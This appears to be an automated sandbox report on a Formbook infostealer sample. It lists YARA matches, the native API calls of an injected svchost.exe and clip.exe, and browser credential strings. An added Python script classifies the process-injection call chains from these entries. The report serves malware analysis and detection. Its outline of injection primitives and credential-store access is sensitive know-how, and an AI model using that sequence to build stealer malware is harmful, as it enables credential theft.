            Source: Yara matchFile source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: This is a third-party compiled AutoIt script.4_2_00E13B4C
            Source: TOgpmvvWoj.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: TOgpmvvWoj.exe, 00000004.00000000.1281210288.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cb18a89b-f
            Source: TOgpmvvWoj.exe, 00000004.00000000.1281210288.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_688f6a36-e
            Source: TOgpmvvWoj.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_190f7424-0
            Source: TOgpmvvWoj.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7701b5a4-d
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0042AFF3 NtClose,6_2_0042AFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472B60 NtClose,LdrInitializeThunk,6_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034735C0 NtCreateMutant,LdrInitializeThunk,6_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03474340 NtSetContextThread,6_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03474650 NtSuspendThread,6_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472BE0 NtQueryValueKey,6_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472BF0 NtAllocateVirtualMemory,6_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472B80 NtQueryInformationFile,6_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472BA0 NtEnumerateValueKey,6_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472AD0 NtReadFile,6_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472AF0 NtWriteFile,6_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472AB0 NtWaitForSingleObject,6_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472F60 NtCreateProcessEx,6_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472F30 NtCreateSection,6_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472FE0 NtCreateFile,6_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472F90 NtProtectVirtualMemory,6_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472FA0 NtQuerySection,6_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472FB0 NtResumeThread,6_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472E30 NtWriteVirtualMemory,6_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472EE0 NtQueueApcThread,6_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472E80 NtReadVirtualMemory,6_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472EA0 NtAdjustPrivilegesToken,6_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472D00 NtSetInformationFile,6_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472D10 NtMapViewOfSection,6_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472D30 NtUnmapViewOfSection,6_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472DD0 NtDelayExecution,6_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472DB0 NtEnumerateKey,6_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472C60 NtCreateKey,6_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472C00 NtQueryInformationProcess,6_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472CC0 NtQueryVirtualMemory,6_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472CF0 NtOpenProcess,6_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472CA0 NtQueryInformationToken,6_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03473010 NtOpenDirectoryObject,6_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03473090 NtSetValueKey,6_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034739B0 NtGetContextThread,6_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03473D70 NtOpenThread,6_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03473D10 NtOpenProcessToken,6_2_03473D10
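The svchost.exe entries above (and the equivalent clip.exe entries that follow) list Nt* calls resolved at addresses that cluster in one private region per process, 0x0347xxxx and 0x04A1xxxx, rather than at ntdll exports, and between them they cover every step of a process-injection chain: obtain a handle (NtOpenProcess), stage memory (NtAllocateVirtualMemory, NtCreateSection/NtMapViewOfSection), write it (NtWriteVirtualMemory) and run it (NtSetContextThread, NtQueueApcThread, NtResumeThread). The following Python is an added example, not part of the Joe Sandbox report: it parses such entries, groups the native calls per process, rates each process's injection capability and lists the 64 KiB regions its stubs live in, which is the first thing to compare against the loaded-module list when deciding whether these are direct syscall stubs. The primitive grouping, the technique patterns and the verdict rule are assumptions of this example; the sample lines are copied from the report.

```python
"""Group the 'Code function' Nt* entries of a sandbox report by process and
rate each process's injection capability.

Added example, not part of the Joe Sandbox report.  The role assigned to each
native call, the technique patterns and the verdict rule are assumptions.
"""
import re
from collections import defaultdict

# Constructed sample input: entries copied from the svchost.exe and clip.exe lists
# in the report, plus one Win32-only entry from the AutoIt dropper to show it is ignored.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0042AFF3 NtClose,6_2_0042AFF3",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472CF0 NtOpenProcess,6_2_03472CF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472E30 NtWriteVirtualMemory,6_2_03472E30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472F30 NtCreateSection,6_2_03472F30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472D10 NtMapViewOfSection,6_2_03472D10",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472D30 NtUnmapViewOfSection,6_2_03472D30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472F60 NtCreateProcessEx,6_2_03472F60",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03474340 NtSetContextThread,6_2_03474340",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472EE0 NtQueueApcThread,6_2_03472EE0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472FB0 NtResumeThread,6_2_03472FB0",
    r"Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A14340 NtSetContextThread,LdrInitializeThunk,9_2_04A14340",
    r"Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12D10 NtMapViewOfSection,LdrInitializeThunk,9_2_04A12D10",
    r"Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12EE0 NtQueueApcThread,LdrInitializeThunk,9_2_04A12EE0",
    r"Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12FB0 NtResumeThread,LdrInitializeThunk,9_2_04A12FB0",
    r"Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12CF0 NtOpenProcess,9_2_04A12CF0",
    r"Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A37B40 NtCreateFile,9_2_02A37B40",
    r"Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E84458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00E84458",
]

# "<image>Code function: <pid>_<pass>_<addr> <api>,<api>,...,<pid>_<pass>_<addr>"
LINE_RE = re.compile(
    r"^Source:\s*(?P<image>.+?)Code function:\s*(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s+"
    r"(?P<apis>.+?),(?P=fid)\s*$"
)

# Assumption: the role each native call plays in an injection chain.
PRIMITIVES = {
    "target_handle": {"NtOpenProcess", "NtOpenThread", "NtCreateProcessEx"},
    "remote_memory": {"NtAllocateVirtualMemory", "NtProtectVirtualMemory",
                      "NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "remote_write": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "remote_execute": {"NtSetContextThread", "NtQueueApcThread", "NtResumeThread", "NtCreateThreadEx"},
}


def parse(lines):
    """Return {(image, "pid_pass"): {"apis": set, "regions": set}} for the Nt* entries."""
    procs = defaultdict(lambda: {"apis": set(), "regions": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        proc_key, addr_hex = m["fid"].rsplit("_", 1)
        apis = {a for a in m["apis"].split(",") if a.startswith("Nt")}
        entry = procs[(m["image"], proc_key)]
        entry["apis"] |= apis
        if apis:
            entry["regions"].add(int(addr_hex, 16) >> 16)  # 64 KiB granularity
    return dict(procs)


def assess(procs):
    """Rate each process: which primitives it has, which patterns they form, where its stubs sit."""
    findings = {}
    for key, info in procs.items():
        apis = info["apis"]
        hits = {role: sorted(apis & names) for role, names in PRIMITIVES.items()}
        techniques = []
        if {"NtSetContextThread", "NtResumeThread"} <= apis:
            techniques.append("thread-context hijack")
        if "NtQueueApcThread" in apis:
            techniques.append("APC injection")
        if {"NtCreateSection", "NtMapViewOfSection"} <= apis:
            techniques.append("section mapping")
        if {"NtUnmapViewOfSection", "NtCreateProcessEx"} <= apis:
            techniques.append("process hollowing indicators")
        findings[key] = {
            "primitives": hits,
            "techniques": techniques,
            # Verdict rule (assumption): handle + write + execute in one process.
            "injection_capable": all(hits[r] for r in ("target_handle", "remote_write", "remote_execute")),
            "stub_regions": sorted(f"0x{r:04X}0000" for r in info["regions"]),
        }
    return findings


if __name__ == "__main__":
    for (image, proc), f in assess(parse(SAMPLE_LINES)).items():
        print(f"{proc} {image}: capable={f['injection_capable']} {f['techniques']} stubs in {f['stub_regions']}")
```

For svchost.exe the stubs fall in two regions, 0x00420000 (the unpacked image, NtClose at 0x0042AFF3) and 0x03470000; neither is where ntdll.dll is normally mapped, so the next step in a manual review is to match those regions against the process's module list and, if they are unbacked, treat the Nt* calls as private syscall stubs rather than ordinary imports.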
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A14650 NtSuspendThread,LdrInitializeThunk,9_2_04A14650
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A14340 NtSetContextThread,LdrInitializeThunk,9_2_04A14340
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_04A12CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12C60 NtCreateKey,LdrInitializeThunk,9_2_04A12C60
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A135C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A139B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A12B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A13090 NtSetValueKey
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A13010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A13D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_04A13D70 NtOpenThread
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_02A37B40 NtCreateFile
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_02A37E30 NtClose
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_02A37F90 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_02A37CA0 NtReadFile
            Source: C:\Windows\SysWOW64\clip.exe Code function: 9_2_02A37D90 NtDeleteFile
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00E740B1: CreateFileW,_memset,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00E68858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00E7545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: String function: 00E38B40 appears 42 times
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: String function: 00E17F41 appears 35 times
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: String function: 00E30D27 appears 70 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 277 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04A5F290 appears 105 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04A27E54 appears 102 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 049CB970 appears 277 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04A4EA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04A15130 appears 58 times
            Source: TOgpmvvWoj.exe, 00000004.00000003.1294226378.0000000003923000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TOgpmvvWoj.exe
            Source: TOgpmvvWoj.exe, 00000004.00000003.1294992955.0000000003ACD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TOgpmvvWoj.exe
            Source: TOgpmvvWoj.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@14/11
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E7A2D5 GetLastError,FormatMessageW, 4_2_00E7A2D5
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E68713 AdjustTokenPrivileges,CloseHandle, 4_2_00E68713
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E68CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 4_2_00E68CC3
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E7B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 4_2_00E7B59E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E8F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 4_2_00E8F121
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E886D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 4_2_00E886D0
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E14FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 4_2_00E14FE9
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | File created: C:\Users\user~1\AppData\Local\Temp\aut8D99.tmp
            Source: TOgpmvvWoj.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: clip.exe, 00000009.00000003.1670877674.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3758257175.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3758257175.0000000002B23000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1668150510.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: TOgpmvvWoj.exe | ReversingLabs: Detection: 60%
